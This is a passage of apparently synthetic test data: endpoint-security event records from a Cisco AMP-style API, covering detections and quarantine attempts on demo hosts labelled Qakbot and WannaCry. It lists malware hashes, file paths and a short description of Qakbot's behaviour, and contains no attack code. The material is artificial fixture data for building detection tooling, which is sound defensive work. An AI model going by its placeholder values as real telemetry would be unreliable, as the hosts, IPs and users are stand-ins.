Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12","md5":"a97fb86da4e010974860e5024137b56b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.GenericKD:Gen.20fu.1201","detection_id":"6411456342573187074","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":558000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411456342573187073","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1492784107692000800,"timestamp":1610627262,"timestamp_nanoseconds":692000000,"date":"2021-01-14T12:27:42+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610627262,"start_date":"2021-01-14T12:27:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. 
It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458626002840536600,"timestamp":1610627243,"timestamp_nanoseconds":268148295,"date":"2021-01-14T12:27:23+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583861114428195000,"timestamp":1610626750,"timestamp_nanoseconds":161000000,"date":"2021-01-14T12:19:10+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264747552596296000,"timestamp":1610626264,"timestamp_nanoseconds":27000000,"date":"2021-01-14T12:11:04+00:00","event_type":"File Fetch 
Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":756000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Auto.A280012EEE.in10.tht.Talos","detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"X4.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\X4.exe","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62","sha1":"c235e18bae63d6c4b5daadb833686f943de65a5f","md5":"a659ff79ef7ffacbd61d4c2641379e44"},"parent":{"process_id":4744,"disposition":"Clean","file_name":"wscript.exe","identity":{"sha256":"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97","sha1":"2131cff0959d213cd9a5e8a8ac362d265d5b1316","md5":"045451fa238a75305cc26ac982472367"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":772000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":208000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":193000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":853000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":884000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583853374897127000,"timestamp":1610624948,"timestamp_nanoseconds":562000000,"date":"2021-01-14T11:49:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043963,"timestamp":1610624472,"timestamp_nanoseconds":496121997,"date":"2021-01-14T11:41:12+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043964,"timestamp":1610624472,"timestamp_nanoseconds":498576872,"date":"2021-01-14T11:41:12+00:00","event_type":"Multiple Infected 
Files","event_type_id":1107296258,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671599780921000,"timestamp":1610623726,"timestamp_nanoseconds":440000000,"date":"2021-01-14T11:28:46+00:00","event_type":"Retrospective 
Quarantine","event_type_id":553648155,"detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671595485954000,"timestamp":1610623725,"timestamp_nanoseconds":899000000,"date":"2021-01-14T11:28:45+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.FCE5B6784D-100.SBX.TG","detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"pp32.exe","file_path":"\\\\?\\C:\\pp32.exe","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79","sha1":"bdb11107a33eaeded6a838eb2a0e6167637dbe9c","md5":"5df0c4ebca109779dc8afc745d612637"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":453000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":437000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":875000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":361000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437901","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":797000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 